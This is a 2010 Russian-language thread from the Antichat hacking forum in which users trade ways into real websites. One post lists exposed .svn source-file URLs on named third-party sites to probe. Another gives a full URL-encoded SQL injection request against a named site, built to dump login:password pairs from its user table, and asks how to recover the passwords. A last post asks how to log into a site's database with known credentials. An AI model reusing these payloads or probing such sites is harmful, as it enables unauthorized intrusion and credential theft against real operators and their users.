ANTICHAT Forum
HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
НОВЫЕ ТОРГОВАЯ НОВОСТИ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 31.01.2010, 19:35
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
С нами: 9780227

Репутация: 1423
По умолчанию

aldonin, http://habrahabr.ru/blogs/infosecurity/70330/

Цитата:
Но можно пойти и далее. В той же папке .svn находится директори text-base, в которой лежат последние версии всех файлов, находящихся в репозитории. Картину дополняет так же и то, что файлы имеют не стандартное расширение (например .php), которое позволяет их сразу отправить на интерпретатор, а дополнительное расширение .svn-base, благодаря которому файл отдается запросившему его человеку «как есть», т.е. голый исходный код!

draftcopy.ru/.svn/text-base/index.php.svn-base

Стоит заметить, что описанная картина является идеальной и хоть она и была таковой в большинстве случаев, все же большой процент исходных кодов не удалось получить по тем или иным причинам.
Так что так. Поковыряй, может найдешь чего интересного

http://www.wi-fi.org/.svn/text-base/info.php.svn-base
http://kp.ru/.svn/text-base/autohandler.svn-base
 
Ответить с цитированием

  #2  
Старый 31.01.2010, 19:39
aldonin
Новичок
Регистрация: 11.01.2009
Сообщений: 5
С нами: 9120767

Репутация: 0
По умолчанию

Это я уже смотрел.А как они видели файловую структуру,такого не отображается почему-то?Пробывал через клиент но просит естественно пароль.Может там хеш валяется как нить полезный?=)
 
Ответить с цитированием

  #3  
Старый 31.01.2010, 19:43
MastaBass1
Новичок
Регистрация: 25.12.2009
Сообщений: 16
С нами: 8620050

Репутация: 0
По умолчанию

Делаю зарос

http://www.ollis.ru/index.php?rest=1')%20union%20select%20*%20FROM%20( SELECT%20*%20FROM%20(SELECT%20NAME_CONST((SELECT%2 0concat_ws(0x3a,user_loginname,user_password)%20FR OM%20e107.e107_user%20LIMIT%201),%2014)d)%20as%20t %20%20JOIN%20(SELECT%20NAME_CONST((SELECT%20concat _ws(0x3a,user_loginname,user_password)%20FROM%20e1 07.e107_user%20LIMIT%201),%2014)e)%20b)a%23

выводит только логин , как найти пароль?
 
Ответить с цитированием

  #4  
Старый 31.01.2010, 19:46
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами: 9410786

Репутация: 2731


По умолчанию

Цитата:
Сообщение от MastaBass1  
Делаю зарос

http://www.ollis.ru/index.php?rest=1')%20union%20select%20*%20FROM%20( SELECT%20*%20FROM%20(SELECT%20NAME_CONST((SELECT%2 0concat_ws(0x3a,user_loginname,user_password)%20FR OM%20e107.e107_user%20LIMIT%201),%2014)d)%20as%20t %20%20JOIN%20(SELECT%20NAME_CONST((SELECT%20concat _ws(0x3a,user_loginname,user_password)%20FROM%20e1 07.e107_user%20LIMIT%201),%2014)e)%20b)a%23

выводит только логин , как найти пароль?
Не выводит он логина, а пишет, что доступ к таблице e107_user текущему пользователю запрещен.
 
Ответить с цитированием

  #5  
Старый 31.01.2010, 19:48
MastaBass1
Новичок
Регистрация: 25.12.2009
Сообщений: 16
С нами: 8620050

Репутация: 0
По умолчанию

Цитата:
Сообщение от mailbrush  
Не выводит он логина, а пишет, что доступ к таблице e107_user текущему пользователю запрещен.
И как это обойти?И возможно ли?
 
Ответить с цитированием

  #6  
Старый 31.01.2010, 19:53
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами: 9410786

Репутация: 2731


По умолчанию

Цитата:
Сообщение от MastaBass1  
И как это обойти?И возможно ли?
Никак. Нет.
 
Ответить с цитированием

  #7  
Старый 31.01.2010, 19:54
MastaBass1
Новичок
Регистрация: 25.12.2009
Сообщений: 16
С нами: 8620050

Репутация: 0
По умолчанию

Цитата:
Сообщение от mailbrush  
Никак. Нет.
Тоесть пользователей пароли никак.А говорил читай сатьи...все вытащишь.
 
Ответить с цитированием

  #8  
Старый 31.01.2010, 20:02
aldonin
Новичок
Регистрация: 11.01.2009
Сообщений: 5
С нами: 9120767

Репутация: 0
По умолчанию

А вот тут вроде более интересная инфа о сайте http://kp.ru/.svn/text-base/autohandler.svn-base#raw ?
 
Ответить с цитированием

  #9  
Старый 31.01.2010, 20:27
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами: 9593606

Репутация: 4915


По умолчанию

MastaBass1
Будешь флудить в теме, отправишься в бан.
Тебе уже сказали, если надо, разбирайся, всё тебе уже показали, если лень дай денег кому-нибудь в разделе работа.
Просьбы о взломах тут запрещены
И в ПМ мне тоже спамить не нужно =\
 
Ответить с цитированием

  #10  
Старый 01.02.2010, 10:22
kodep
Новичок
Регистрация: 29.01.2010
Сообщений: 10
С нами: 8569856

Репутация: 0
По умолчанию

Знаю пользователя базы данных mysql и пароль на одном сайте. Подскажите как зайти под этими данными в субд...
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 8 (пользователей: 0 , гостей: 8)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.